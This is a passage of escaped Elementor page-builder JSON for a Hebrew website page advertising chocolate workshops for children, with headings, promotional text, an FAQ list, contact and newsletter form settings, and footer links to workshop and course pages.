Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05de\\u05d0\\u05d6 \\u05d5\\u05de\\u05ea\\u05de\\u05d9\\u05d3 \\u05d4\\u05d9\\u05d4 \\u05d4\\u05de\\u05d0\\u05db\\u05dc \\u05e9\\u05e7\\u05d9\\u05e8\\u05d1 \\u05d1\\u05d9\\u05df \\u05d4\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05d4\\u05d9\\u05d5 \\u05e7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05dc\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9\\u05e6\\u05dc \\u05e9\\u05d4\\u05d9\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05db\\u05dc \\u05d4\\u05d9\\u05d5\\u05dd. \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5 \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05e9\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05dc \\u05ea\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05e8\\u05d9\\u05e7\\u05d4 \\u05de\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d9 \\u05d2\\u05dd \\u05d0\\u05ea\\u05dd \\u05ea\\u05d9\\u05d4\\u05e0\\u05d5 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d5\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05db\\u05e9\\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d5\\u05d1\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd. \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05de\\u05e2\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05e0\\u05d4\\u05e0\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d4\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd.<\\/p><p><strong>\\u05db\\u05df, \\u05d2\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8 \\u05dc\\u05db\\u05dd, \\u05d6\\u05d4 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c10ea65\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7602a7a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7297bf5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4541ce0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"7952f0ec\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4df9243\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"2024cfba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"34b4157f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"42863b35\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"3bedbf86\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7ee51c99\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"414e8603\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6cd310bc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 